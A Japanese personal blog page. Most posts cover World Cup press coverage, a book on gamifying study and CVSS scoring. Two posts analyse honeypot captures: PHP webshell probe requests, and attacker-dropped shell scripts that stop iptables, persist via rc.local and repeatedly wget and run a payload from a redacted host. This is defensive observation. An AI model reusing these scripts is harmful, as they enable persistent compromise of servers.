とりあえずブログ

普通のサラリーマンの雑多なブログ

日本代表vsセネガル代表の試合を海外メディアはどう報道しているか

遅くなりましたが、一昨日のセネガル戦について書きます。

引き分けに終わってしまいましたが、個人的には勝たなければいけない試合だったと感じています。

失点に関しても、1点目は複数のミスが重なって失点してしまいましたし、シュートに関しても2点くらい日本代表の決定的なシーンがあったので、勝ちきってほしい印象でした。

この試合について海外ではどう報道されているかコロンビア戦に続きまとめたいと思います。

saito.hatenadiary.com

Agencia EFE

www.efe.com

Japan and Senegal tie 2-2 in beautiful match, keep knockout round hopes alive
(日本とセネガルは美しい試合の中2−2の引き分け、最終ゲームに望みをかける)

Agencia EFEは日本がより支配的で多くのチャンスを得たと評価しています。

The Japanese side was more dominant and had more chances in their second match of the tournament, but the Senegalese gave a lesson in effectiveness.

Agencia EFEはセネガルのシセ監督のインタビュー記事も書いています。

www.efe.com

この記事の中で、シセ監督がセネガル代表のマネを称賛していて、次のコロンビア戦でも重要な存在になってくると思います。

sky sports

www.skysports.com

Japan 2-2 Senegal: Keisuke Honda rescues point for Japan
(日本 2-2 セネガル: 本田圭佑が日本のために点を奪う)

sky sportsではまず本田さんを称賛しています。

と同時に1点目の日本の失点を川島さんのミスと指摘しています。 たしかにあれは、ミスだよなーと思います。

In a game of goalkeeping errors, Senegal took an early lead when Eiji Kawashima turned Youssouf Sabaly's shot into the body of Sadio Mane for a goal he knew little about after 11 minutes.

sky sportsでは毎試合選手のレーティングを示してくれるので、おもしろいです。

f:id:tkm03:20180626211928p:plain

sky sportsでのMoMは綺麗なゴールを決めた乾さんです。 1点目の華麗なゴールと2点目のアシストが大きなポイントになったと評価しています。

Eibar winger Inui was brilliant for Japan and perhaps unlucky not to get a second goal on the night, but grabbing one, plus an assist for the second, was a fine return from a committed performance.

吉田さんも7と高得点ですが、川島さんと香川さんが5と低いです。

たしかに香川さんもあまりチャンスがなかった気がします。。。

The New York Times

www.nytimes.com

Japan and Senegal Control World Cup Fates After Draw
(日本とセネガルはドローの後もW杯の運命をコントロール

The New York Timesでは、試合結果に加え、その後に行われるコロンビア対ポーランドの試合にも触れ、いずれの結果になったとしても、両チームは自力での決勝トーナメントに行ける可能性が残ったと紹介しています。

西野監督が試合前に「5センチ高くしろ、5キロ太れ」と選手たちに冗談を言ったことを紹介し、おもしろいです。

Japan Coach Akira Nishino joked before the game that he had instructed his players to “grow 5 centimeters and gain 5 kilograms” ahead of this clash, a nod to Senegal’s physical advantage in the matchup. The opening minutes proved him prophetic.

REUTERS

uk.reuters.com

Honda salvages 2-2 draw for Japan against Senegal with late strike
(本田は遅めのシュートで日本を救う)

ロイターでは本田をかなり評価している様子です。

また、マネさんの悔しそうなコメントを紹介していて、とても興味深いです。

“We’re a bit disappointed... there was a way to win this match,” added Mane, who failed to exert his influence despite scoring. “We started well, we created a lot of opportunities, we were quite dangerous... we now have a decisive match to qualify next week.”
(「我々は少々失望している。この試合に勝つことができた。」と得点を決めたにも関わらず影響を発揮できなかったマネ選手は加える。「我々はよくスタートした。多くのチャンスを作った。とても危険だった・・・。来週に向けて決定的な試合がある。」)

全体的に得点を決めた乾さんや本田さんを評価しているようでした。

海外目線で日本のことを知るのは面白いので、今後も引き続き海外メディアの内容はご紹介したいと思います。

ポーランド戦では勝って決勝トーナメント進出を決めて欲しいです!

日本代表vsコロンビア代表の試合を海外メディアはどう報道しているか

昨日のコロンビア戦で日本代表が勝利して、勝ち点3を取ってとても嬉しいです。

代表選手達も最後まで気を抜かず、引き締まっていた試合だったかなと思います。

今日以降、日本のメディアでは様々な評価がされると思いますが、世界のメディアでは日本対コロンビア戦をどう見ているのか気になったので、調べてみました。

Agencia EFE

Agencia EFEはスペインの通信社で、サッカーの報道をよくしているのですが、コロンビア戦も終了後すぐに記事を掲載していました。

Japan puts damper on Colombia's high hopes for World Cup debut with 1-2 win (日本が1-2でコロンビアのW杯の初戦をくじいた。)

www.efe.com

記事では、香川さんと大迫さんのゴールが紹介されています。

sky sports

sky sportsはイギリスのスポーツ専門チャンネルですが、こちらでも試合後すぐに取り上げられていました。

Yuya Osako header seals emotional opening win
大迫勇也のヘッドが感動的な勝利を決める)

www.skysports.com

ここでも大きく大迫のヘッドが取り上げられています。 面白いのが、途中出場したハメス・ロドリゲスのPlayer ratingsが低い値の5になっているのが、特徴的でした。

f:id:tkm03:20180620010550p:plain

sky sportsでは、大阪での地震がある中の試合と記載されていて、日本の事情をよく知っているなと感じました。

The New York Times

ニューヨークタイムズはもうご存知ですね。

こちらでも試合後すぐに記事がアップされていました。

Japan’s World Cup Starts With a Wild Win Over Colombia
(日本のワールドカップはコロンビアに対する荒々しい勝利で始まる)

www.nytimes.com

ニューヨークタイムズでは時系列で詳しく試合内容を紹介していました。 また、今回の勝利はグループにとっても大きなものとなると評価しています。

REUTERS

ロイターさんも有名ですね。

こちらでも試合後すぐに取り上げられていました。

uk.reuters.com

Japan sink 10-man Colombia in historic win for Asia
(日本はアジアにとって歴史的な勝利に向けて10人のコロンビアを下す)
訳むずい。。。

ロイターでは、今回の日本の勝利を歴史的な勝利と高く評価していますが、面白いのはコロンビア代表の監督のコメントを紹介しているところが特徴的でした。

“Without doubt we were expecting something different, we were hoping to start with a victory,” Pekerman said. “It’s unfortunate for the people of Colombia who came here with high hopes. This is obviously going to leave us with a bitter memory.”
(間違いなく、私たちは違うことを期待していた。私たちは勝利で始めることを望んでいた。大きな期待を持ってここに来たコロンビアの人々にとっては不運だった。今回の試合は間違いなく私たちに苦い記憶を残すだろう。)

とても悔しそうですね。

今回いろんな海外メディアの試合内容の紹介を見てみましたが、それぞれ意外と個性があっておもしろいので、今後の試合でもチェックしたいと思います。 訳に間違いがございましたら、ご指摘ください。

なんとなくニューヨークタイムズが一番クセが強いです。笑

関連記事です。

saito.hatenadiary.com

Hello, Peppa!という謎のアクセス

何気なくGlastopfのログを見ていると、いつもとは違った変なアクセスがありました。

同じ時刻に同じIPアドレスから6件アクセスが来ているので、何らかのスクリプト脆弱性がないか探索しているものと推測できます。

アクセス①

POST /wuwu11.php HTTP/1.1
Connection: Close
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Host: XXX.XXX.XXX.XXX:80
User-Agent: Mozilla/5.0

h=die('Hello, Peppa!');

アクセス②

POST /xw.php HTTP/1.1
Connection: Close
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Host: XXX.XXX.XXX.XXX:80
User-Agent: Mozilla/5.0

h=die('Hello, Peppa!');

アクセス③

POST /xx.php HTTP/1.1
Connection: Close
Content-Length: 25
Content-Type: application/x-www-form-urlencoded
Host: XXX.XXX.XXX.XXX:80
User-Agent: Mozilla/5.0

axa=die('Hello, Peppa!');

アクセス④

POST /s.php HTTP/1.1
Connection: Close
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
Host: XXX.XXX.XXX.XXX:80
User-Agent: Mozilla/5.0

leng=die('Hello, Peppa!');

アクセエス

POST /w.php HTTP/1.1
Connection: Close
Content-Length: 26
Content-Type: application/x-www-form-urlencoded
Host: XXX.XXX.XXX.XXX:80
User-Agent: Mozilla/5.0

leng=die('Hello, Peppa!');

アクセス⑥

POST /sheep.php HTTP/1.1
Connection: Close
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Host: XXX.XXX.XXX.XXX:80
User-Agent: Mozilla/5.0

m=die('Hello, Peppa!')

アクセスしている下記6つのファイルをネットで検索してみましたが、これといって有益な情報は出て来ませんでした。。。

Body部分に含まれているキーワードの「Hello, Peppa!」でも調べてみましたが、イギリスの豚のキャラクターしか出てこなかったです。笑


Peppa Pig Full Episodes | LIVE Peppa Pig 2018 #144

かわいい。。。

まだアクセスログもそんなに多くないので、今後このアクセスが増えてくれば、もう少し情報が出てくると思います。

知っている方がいらっしゃいましたら、教えてください。

紀州のドン・ファン野崎幸助の事件をウォッチしていく

先日紀州ドン・ファンの野崎幸助が亡くなって、ファンの一人としてとても悲しいのですが、事件性があるので、この記事ではそれをウォッチしていきたいと思います。

情報源は主にネットニュースです。

随時新しい情報が入れば、更新していきます。

2018/5/24(木)

野崎幸助さん(77)自宅で死亡。 6月上旬あたりから遺体から覚せい剤反応が出たとニュースになる。

急死“ドン・ファン”ビールに覚醒剤混入か|日テレNEWS24

2018/6/7(木)

警察が野崎さんの愛犬の死因調査を開始する。 野崎さんの死因となった覚せい剤の反応が同じく愛犬から検出されるかどうか調査しているとのことだが、まだ結果が出ていない模様。

“紀州のドン・ファン”不審死、愛犬は鑑定できる状態 TBS NEWS

紀州のドン・ファン怪死 愛犬イブから覚せい剤反応か いよいよ殺人事件へ (2/2) 〈週刊朝日〉|AERA dot. (アエラドット)

随時更新します。

【読書メモ】ゲームと仕事の違いは何か『残酷すぎる成功法則』

最近マインクラフトにハマりすぎていて、読書する時間、ブログ書く時間、勉強する時間、プログラミングする時間など僕が生産的と思っている時間が少なくなっているので、ゲームと仕事や勉強などの違いを知りたくて、『残酷すぎる成功法則』を読みました。

残酷すぎる成功法則  9割まちがえる「その常識」を科学する

残酷すぎる成功法則 9割まちがえる「その常識」を科学する

結論から言うと、根本的には違いは無くて、個人の捉え方に違いがあると知ったので、どう捉えたら仕事や勉強などがゲームみたいに夢中になれるかご紹介したいと思います。

この本では上記にあるような僕の疑問に直接的にヒントを与えてくれるところが多々あり、とても参考になりました。

ここで疑問が湧いてくる。厄介なことも多く、挫折感も味わうゲームは学業や仕事と大差ないのに、どうして人はゲームにワクワクし、仕事にはウンザリなのか? 

エリック・バーカー;橘玲.残酷すぎる成功法則(Kindleの位置No.1685-1687).株式会社飛鳥新社.Kindle版.

ゲームの仕組みを仕事や勉強に適用すれば、人生でも成功できるとこの本では主張しています。

その仕組みとは、「WNGF」という仕組みです。

WNGFとは

WNGFとは、

  • 勝てること(Winnable)
  • 斬新であること(Novel)
  • 目標(Goals)
  • フィードバック(Feedback)

の頭文字を取ったものになります。

多くのゲームは上記の4つの要素がうまく仕組まれていて、仕事や勉強はそれらの要素が少ないためにつまらなくなってしまうとのこです。

なので僕が今ハマっているマインクラフトと勉強(現状)を比較してみました。

f:id:tkm03:20180614210832p:plain

こんな感じだと思います。

マインクラフトなど様々なゲームは大体勝てるし、斬新で新しい目標がどんどん出現するし、何より成果が見えやすいのに対し、勉強は勝てない(なかなか成果が上がっていると感じられない)ことが多いような気がします。

勉強に関して大事なことは、まずは簡単に勝てるゴールを設定することが大事なんだなあと思いました。

例えば、

  • 参考書を買う
  • 目次だけ見てみる
  • 1問だけ問題を解いてみる

など、可能な限り簡単に勝てるゴールを設定する工夫をすれば、ゲーム性が増すと思います。

また、斬新さに関しても、今はできないことを悲観的に捉えるのではなく、それを新しいステージだと思って、取り組むことが斬新さを向上させることに繋がると思います。

目標に関しては、フィードバックと被るとことがあるのですが、長期的にみてもある程度わかりやすいゴールを設定した方が勉強に夢中になれると思います。 (例えば、資格を取得するなど。)

ということで、上記の表を修正したものがこちらです。

f:id:tkm03:20180614211325p:plain

なんとなく、この4つの要素を向上させることで、勉強も楽しく取り組むことができるようになりそうです。

みなさんも頑張りたいけど、なんか後回しにしてしまうようなことがあれば、この4つの要素を取り入れて、楽しく生活していってほしいです。

上記のシートを記入できるようにしたので、よかったら使ってみてください。

f:id:tkm03:20180614212611p:plain

ダウンロードはこちらから。

https://drive.google.com/open?id=15m3E0kLnpa66Ng6LzGt_8sO5pvOmFnGH

SSHハニーポットCowrieでダウンロードされたファイルを見てみる

しばらくCowrieを放置していたのですが、かなりアクセスが来ているようで、実際にダウンロードされたファイルもたくさんあったので、どんなファイルがダウンロードされていたかご紹介したいと思います。

f:id:tkm03:20180610184955p:plain

Cowrieの場合、攻撃者がSSHでログインして何かしらのファイルをダウンロードした場合、上記の公式ドキュメントのとおりdlディレクトリに格納されます。

早速そこのディレクトリの中を覗いてみようと思います。

-rw-r--r--  1 cowrie cowrie      59 Jun 10 02:44 07f637a3d34119fc8818d7eb6d7b4aa17891a1bf9cb563df13d6802864b89386
-rw-r--r--  1 cowrie cowrie 1035157 Jun  1 01:24 0ffa9e646e881568c1f65055917547b04d89a8a2150af45faa66beb2733e7427
-rw-r--r--  1 cowrie cowrie    2250 May 31 04:10 12a51f899c8fab7c131b4b851cca0c84e95f31aadc86ce1198fae91126304127
-rw-r--r--  1 cowrie cowrie 3239584 Jun  4 21:38 12d6f7971e5797e060621aa150eda78e814a3a9dab093f6e58d83cd94a71ced1
-rw-r--r--  1 cowrie cowrie 1223123 Jun  6 14:56 176a317df7b801a5af856e8b351995dacba50f6d4df1281235dce536e63c6251
-rw-r--r--  1 cowrie cowrie    2267 Jun  6 22:59 36fc374823925e9d1c14bd41e282284111fbd345c8d9755974ea0e568f8ddbee
-rw-r--r--  1 cowrie cowrie   65400 Jun  4 14:35 399851bc221ffe3999f82ff7cd70a150ed92dbaa04c6e0f21bccf176d5dd0ceb
-rw-r--r--  1 cowrie cowrie    7200 Jun  3 18:48 4188692fd507fe4c362ad5aa99b5db01673e88ec8bfe605986ceb1480c2e6c97
-rw-r--r--  1 cowrie cowrie    2327 Jun  1 02:12 4f75eec50688856480316bb404ba90d33d5de43ded45066b5a3d9b3fb7cc8720
-rw-r--r--  1 cowrie cowrie 1034309 Jun  1 01:22 5685b086ce12ffede8814e303223a67eca476735dfe4e9e84b751354a5ea0232
-rw-r--r--  1 cowrie cowrie 1203885 Jun  1 01:23 5c8c41253aa68adeb955e7d1c7b8e084e06537f75eff12c3f3a0f3cb30cb2152
-rw-r--r--  1 cowrie cowrie       1 Jun  7 17:00 6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d
-rw-r--r--  1 cowrie cowrie    2253 Jun  4 21:37 7f4baf3bc359fe5679b76b2873ee5d3e474f6436bbb2f3027383ac87b9e2b590
-rw-r--r--  1 cowrie cowrie 1215093 Jun  1 01:23 86fbdd7df9486a17e9c408c7e50635e26402fdf297c9e97f1a5256100401dcc5
-rw-r--r--  1 cowrie cowrie 1223123 Jun  4 13:11 885fdc6be061dae3a95501f636924c1e7305684a468cd382ed8246e8bf84a5ff
-rw-r--r--  1 cowrie cowrie 1069817 Jun  1 01:22 9c2848962733846bf50b490fd8f6c7ce9ecade2d3f2f530f5ecbba283af87d3a
-rw-r--r--  1 cowrie cowrie      73 Jun  6 14:58 9e5f93361b899d85a00a286bd1ea96b056d102926f96c131fc988739eca18355
-rw-r--r--  1 cowrie cowrie 1223123 May 31 04:10 beba1a9b20f23f022bd354e5128c463bbe52c3715b406a3aae73e7e33f39518a
-rw-r--r--  1 cowrie cowrie    7432 Jun  1 17:58 d94e3cd7a3575da5b8326298fe93fa7504979640257d3beab511f4257ac47803
-rw-r--r--  1 cowrie cowrie 1236080 Jun  6 22:59 e651a05c9cb0bde4e8efa635f699ba3e186afd4ae4c42760e3d97ffa01d8c8ca
-rw-r--r--  1 cowrie cowrie 1135000 Jun  4 13:19 f1c8304d393a42b42cde13663089a6bd46713f7abadfe8294efcec7142cb4fbe
-rw-r--r--  1 cowrie cowrie      58 May 31 04:10 f8c28666f2f2beb599dcc62721c41a82f52e63721dd2d5629073033b32a93154
-rw-rw-r--  1 cowrie cowrie      14 May 29 21:53 .gitignore
-rw-------  1 cowrie cowrie       0 Jun  4 21:36 tmp5g1gzD
-rw-------  1 cowrie cowrie       0 May 31 04:09 tmp8InVpr
-rw-------  1 cowrie cowrie       0 May 31 04:09 tmpi2B1wA

めちゃめちゃファイルがダウンロードされてます。。。笑

fileコマンドでどんなタイプのファイルが来ているか確認してみた結果がこちらです。

$ file *
07f637a3d34119fc8818d7eb6d7b4aa17891a1bf9cb563df13d6802864b89386: ASCII text
0ffa9e646e881568c1f65055917547b04d89a8a2150af45faa66beb2733e7427: ELF 32-bit LSB  executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
12a51f899c8fab7c131b4b851cca0c84e95f31aadc86ce1198fae91126304127: Bourne-Again shell script, ASCII text executable
12d6f7971e5797e060621aa150eda78e814a3a9dab093f6e58d83cd94a71ced1: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=c77cd956ea0e1620a83b6385e1246f0a8c59c270, not stripped
176a317df7b801a5af856e8b351995dacba50f6d4df1281235dce536e63c6251: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
36fc374823925e9d1c14bd41e282284111fbd345c8d9755974ea0e568f8ddbee: Bourne-Again shell script, ASCII text executable
399851bc221ffe3999f82ff7cd70a150ed92dbaa04c6e0f21bccf176d5dd0ceb: ELF 32-bit LSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
4188692fd507fe4c362ad5aa99b5db01673e88ec8bfe605986ceb1480c2e6c97: Perl script, ASCII text executable
4f75eec50688856480316bb404ba90d33d5de43ded45066b5a3d9b3fb7cc8720: Bourne-Again shell script, ASCII text executable
5685b086ce12ffede8814e303223a67eca476735dfe4e9e84b751354a5ea0232: ELF 32-bit LSB  executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
5c8c41253aa68adeb955e7d1c7b8e084e06537f75eff12c3f3a0f3cb30cb2152: ELF 32-bit LSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
6e340b9cffb37a989ca544e6bb780a2c78901d3fb33738768511a30617afa01d: very short file (no magic)
7f4baf3bc359fe5679b76b2873ee5d3e474f6436bbb2f3027383ac87b9e2b590: Bourne-Again shell script, ASCII text executable
86fbdd7df9486a17e9c408c7e50635e26402fdf297c9e97f1a5256100401dcc5: ELF 32-bit MSB  executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
885fdc6be061dae3a95501f636924c1e7305684a468cd382ed8246e8bf84a5ff: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
9c2848962733846bf50b490fd8f6c7ce9ecade2d3f2f530f5ecbba283af87d3a: ELF 32-bit LSB  executable, ARM, version 1, statically linked, stripped
9e5f93361b899d85a00a286bd1ea96b056d102926f96c131fc988739eca18355: ASCII text
beba1a9b20f23f022bd354e5128c463bbe52c3715b406a3aae73e7e33f39518a: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
d94e3cd7a3575da5b8326298fe93fa7504979640257d3beab511f4257ac47803: Perl script, ASCII text executable
e651a05c9cb0bde4e8efa635f699ba3e186afd4ae4c42760e3d97ffa01d8c8ca: ELF 64-bit LSB  executable, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=c0c8301fa94c01ee6d79e0d745b7830c77693a97, stripped
f1c8304d393a42b42cde13663089a6bd46713f7abadfe8294efcec7142cb4fbe: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
f8c28666f2f2beb599dcc62721c41a82f52e63721dd2d5629073033b32a93154: ASCII text
tmp5g1gzD:                                                        empty 
tmp8InVpr:                                                        empty 
tmpi2B1wA:                                                        empty 

一番多いのが、"ELF 32-bit MSB executable"という標準バイナリ形式のファイルでした。

それ以外でもPerlスクリプトだったり、普通のシェルスクリプトだったり、いろんな種類のファイルがダウンロードされていました。

今回は手軽に閲覧できるテキスト形式のファイルの中身を2つほどご紹介したいと思います。

ファイル①

こちらのファイルはroot権限でasd5121という実行ファイルを実行して、iptablesをストップするスクリプトになります。

cd  /root/
./asd5121&
./asd5121&
/etc/init.d/iptables stop

asd5121はバイナリ形式だったので、どんな動作をするのか確認することはできませんでしたが、iptablesを停止されるのは嫌ですね。

ファイル②

次はシェルスクリプトになります。

こちらもインターネット上からファイルをダウンロードして、そのファイルを実行するような動きになっています。

#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
#                qun:10776622
#                2016-06-14

if [ "sh /etc/Xsny.sh &" = "$(cat /etc/rc.local | grep /etc/Xsny.sh | grep -v grep)" ]; then
    echo ""
else
    echo "sh /etc/Xsny.sh &" >> /etc/rc.local
fi

while [ 1 ]; do
    Centos_sshd_killn=$(ps aux | grep "/tmp/ElccR" | grep -v grep | wc -l)
    if [[ $Centos_sshd_killn -eq 0 ]]; then
        if [ ! -f "/tmp/ElccR" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P . http://XXX.top/ElccR
                ./wget -P /tmp/  http://XXX.top/ElccR &> /dev/null
                chmod 755 /tmp/ElccR
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /tmp/ElccR &
        #./ElccR &
    elif [[ $Centos_sshd_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "ElccR" | grep -v grep | awk '{print $2}'); do
            Centos_sshd_killn=$(($Centos_sshd_killn-1))
            if [[ $Centos_sshd_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    Centos_ssh_killn=$(ps aux | grep "/tmp/ElccR" | grep -v grep | wc -l)
    if [[ $Centos_ssh_killn -eq 0 ]]; then
        if [ ! -f "/tmp/ElccR" ]; then
            if [ -f "/usr/bin/wget" ]; then
                cp /usr/bin/wget .
                chmod +x wget
                #./wget -P .  http://XXX.top/ElccR
                ./wget -P /tmp/  http://XXX.top/ElccR &> /dev/null
                chmod 755 /tmp/ElccR
                rm wget -rf
            else
                echo "No wget"
            fi
        fi
        /tmp/ElccR &
        #./ElccR &
    elif [[ $Centos_ssh_killn -gt 1 ]]; then
        for killed in $(ps aux | grep "ElccR" | grep -v grep | awk '{print $2}'); do
            Centos_ssh_killn=$(($Centos_ssh_killn-1))
            if [[ $Centos_ssh_killn -eq 1 ]]; then
                continue
            else
                kill -9 $killed
            fi
        done
    else
        echo ""
    fi

    sleep 600
done

このスクリプトに記載されているURLにアクセスしてみましたが、現在はファイルをダウンロードできないようになっていました。

先頭にあるコメントが面白いですね。

Welcome like-minded friends to come to exchange.
We are a group of people who have a dream.

直訳すると「同じ志を持った仲間を歓迎する。我々はある夢を持ったグループです。」って感じですかね。

今後もCowrieのログは観察していこうと思います。

関連記事です。

saito.hatenadiary.com

saito.hatenadiary.com

エンジニアならCVSS(共通脆弱性評価システム )について知っとこ

日々、ハニーポットを運用していて様々な製品の脆弱性を狙った攻撃を観察していますが、その脆弱性を評価するCVSS(共通脆弱性評価システム )について疎かったので、今日はそのCVSSについてご紹介したいと思います。

CVSSとは

そもそもCVSSとは何なのでしょうか。

IPAによると、

共通脆弱性評価システム CVSS ( Common Vulnerability Scoring System) は、情報システムの脆弱性に対するオープンで包括的、汎用的な評価手法の確立と普及を目指し、米国家インフラストラクチャ諮問委員会( NIAC: National Infrastructure Advisory Council )のプロジェクトで 2004年10月に原案が作成されました。

と説明されております。

CVSSは脆弱性に対するオープンで汎用的な指標で、脆弱性定量的に評価できるのが大きなポイントになります。

CVSSは下記の3つの観点から脆弱性を評価します。

  • 基本評価基準(Base Metrics)
  • 現状評価基準(Temporal Metrics)
  • 環境評価基準(Environmental Metrics)

それぞれの説明はIPAのサイトで詳しく解説されております。

f:id:tkm03:20180606204830p:plain (引用:共通脆弱性評価システムCVSS概説:IPA 独立行政法人 情報処理推進機構

評価基準の詳細な内容

上記の3つの評価基準にはさらに詳細に区分があり、内容は上記サイトに詳しく記載されていますが、区分ごとに値が決まっています。

その各値を基に脆弱性定量的に算出することができるという仕組みになっています。

脆弱性の値の算出方法

値の算出方法も上記サイトに記載されていて、下記のとおりとなっています。

  • CVSS 基本値 (Base Score)

影響度 = 10.41×( 1 - ( 1 - C )×( 1 - I )×( 1 - A ) ) …式(1)

攻撃容易性 = 20×AV×AC×Au …式(2)

f(影響度) = 0(影響度が0の場合) , 1.176(影響度が0以外の場合) …式(3)

基本値 = ((0.6× 影響度)+(0.4× 攻撃容易性 )-1.5)×f(影響度) …式(4)        (小数点第 2 位四捨五入)

  • CVSS 現状値 (Temporal Score)

現状値 = 基本値 ×E×RL×RC (小数点第 2 位四捨五入) …式(5)

  • CVSS 環境値 (Environmental Score)

環境値 =( 調整後現状値 +(10- 調整後現状値 )×CD)×TD …式(8)       (小数点第 2 位四捨五入)

一番やばい値と一番やばくない値について

上記の算出式を基にCVSSの値の一番やばい値(最高値)と一番やばくない値(最低値)を求めてみた結果がこちらです。 f:id:tkm03:20180606224852p:plain

計算してみて分かったのですが、CVSS 基本値 (Base Score)、CVSS 現状値 (Temporal Score)、CVSS 環境値 (Environmental Score)のいずれも実際には「9.99・・・」になるので、小数点第2位を四捨五入すると最高値が10、最低値が0になりました。

全体的な値でやばそうとかやばくなさそうとかは分かるのですが、個々の区分を見ると、攻撃の実行容易生や攻撃の可能性(理論上可能だけど、実行は難しいとか)など細かな特性があるので、それぞれの脆弱性情報を見る際に役に立ちそうです。

ちなみに2018年が始まって、現時点で深刻度が危険レベル(7.0〜10.0)の脆弱性は「脆弱性対策情報データベース」によると、822件もあるので、結構やばい脆弱性がたくさんあるようです。

f:id:tkm03:20180606224807p:plain

上記のCCSSの各値を理解していると、「脆弱性対策情報データベース」を見ても脆弱性のレベル感が具体的に理解できるようになるので、エンジニアの方はぜひ知っといてほしいです。